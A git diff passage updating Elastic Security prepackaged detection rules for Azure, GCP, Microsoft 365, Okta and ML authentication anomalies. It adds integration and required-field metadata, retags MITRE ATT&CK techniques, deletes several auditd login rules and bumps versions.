"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.006", + "name": "HTML Smuggling", + "reference": "https://attack.mitre.org/techniques/T1027/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json index 70c3ea5de73f9..6dc773a88b931 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure External Guest User Invitation", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Invite external user\" and azure.auditlogs.properties.target_resources.*.display_name:guest and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/governance/policy/samples/cis-azure-1-1-0" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.target_resources.*.display_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "141e9b3a-ff37-4756-989d-05d7cbf35b0e", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -64,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json index 2624371aa5a62..721f785c08f3c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP IAM Custom Role Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.CreateRole and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/understanding-custom-roles" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "aa8007f0-d1df-49ef-8520-407857594827", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -63,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_failures.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_failures.json deleted file mode 100644 index 18a201e7638ef..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_failures.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that the maximum number of failed login attempts has been reached for a user.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Max Failed Login Attempts", - "query": "event.module:auditd and event.action:\"failed-log-in-too-many-times-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/0adbaeb273da1d45213134aa271e95987103281c/modules/pam_faillock/pam_faillock.c#L574" - ], - "risk_score": 47, - "rule_id": "fb9937ce-7e21-46bf-831d-1ad96eac674d", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_location.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_location.json deleted file mode 100644 index 3224836eb927a..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_location.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that a login attempt has happened from a forbidden location.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Login from Forbidden Location", - "query": "event.module:auditd and event.action:\"attempted-log-in-from-unusual-place-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/aac5a8fdc4aa3f7e56335a6343774cc1b63b408d/modules/pam_access/pam_access.c#L412" - ], - "risk_score": 73, - "rule_id": "cab4f01c-793f-4a54-a03e-e5d85b96d7af", - "severity": "high", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_sessions.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_sessions.json deleted file mode 100644 index b7a51feb122a1..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_sessions.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that the maximum number login sessions has been reached for a user.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Max Login Sessions", - "query": "event.module:auditd and event.action:\"opened-too-many-sessions-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/70c32cc6fca51338f92afa58eb75b1107a5c2430/modules/pam_limits/pam_limits.c#L1007" - ], - "risk_score": 47, - "rule_id": "20dc4620-3b68-4269-8124-ca5091e00ea8", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_time.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_time.json deleted file mode 100644 index f5ab15fb442f2..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_time.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that a login attempt occurred at a forbidden time.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Login Attempt at Forbidden Time", - "query": "event.module:auditd and event.action:\"attempted-log-in-during-unusual-hour-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/aac5a8fdc4aa3f7e56335a6343774cc1b63b408d/modules/pam_time/pam_time.c#L666" - ], - "risk_score": 47, - "rule_id": "90e28af7-1d96-4582-bf11-9a1eff21d0e5", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json index defd5ce4da497..009e4b1eafa30 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json index 9a14545f39745..8f55ff5266b5c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json index eafb3b71584e2..b91b134f04b31 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Safe Link Policy Disabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json index ce2a713a5c7d2..8c47faa3dfb71 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_user_restricted_from_sending_email.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 User Restricted from Sending Email", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_hour_for_a_user_to_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_hour_for_a_user_to_logon.json similarity index 69% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_hour_for_a_user_to_logon.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_hour_for_a_user_to_logon.json index 8848ec3b7b8c6..3fd62e4ad869e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_hour_for_a_user_to_logon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_hour_for_a_user_to_logon.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } ], "type": "machine_learning", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_source_ip_for_a_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_source_ip_for_a_user.json similarity index 70% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_source_ip_for_a_user.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_source_ip_for_a_user.json index 638e18b85bc01..42e93fe9f872c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_source_ip_for_a_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_source_ip_for_a_user.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } ], "type": "machine_learning", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_user_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_user_logon.json similarity index 74% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_user_logon.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_user_logon.json index d5d055bfa1658..4e856beda0e56 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_rare_user_logon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_auth_rare_user_logon.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } ], "type": "machine_learning", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_user_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_linux_anomalous_user_name.json similarity index 85% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_user_name.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_linux_anomalous_user_name.json index c8b3f97d77f1f..79fa18cc36b35 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_user_name.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_linux_anomalous_user_name.json @@ -26,8 +26,26 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } ], "type": "machine_learning", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_user_name.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_anomalous_user_name.json similarity index 86% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_user_name.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_anomalous_user_name.json index bffcf3ee7eb15..57cdb9246a73d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_user_name.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_anomalous_user_name.json @@ -26,8 +26,26 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } ], "type": "machine_learning", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_type10_remote_login.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_rare_user_type10_remote_login.json similarity index 79% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_type10_remote_login.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_rare_user_type10_remote_login.json index 44d20761419fc..675d93f43048a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_rare_user_type10_remote_login.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_ml_windows_rare_user_type10_remote_login.json @@ -26,8 +26,26 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } ], "type": "machine_learning", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json index 8ceca899412b2..7db155bc005a6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_o365_user_reported_phish_malware.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "O365 Email Reported by User as Malware or Phish", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", "references": [ "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "rule.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -61,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json index d016add9637e3..0d2513dc042a5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_okta_user_attempted_unauthorized_access.json @@ -11,10 +11,29 @@ "language": "kuery", "license": "Elastic License v2", "name": "Unauthorized Access to an Okta Application", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt\n", + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "4edd3e1a-3aa0-499b-8147-4d2ea43b1613", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -70,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_password_recovery.json 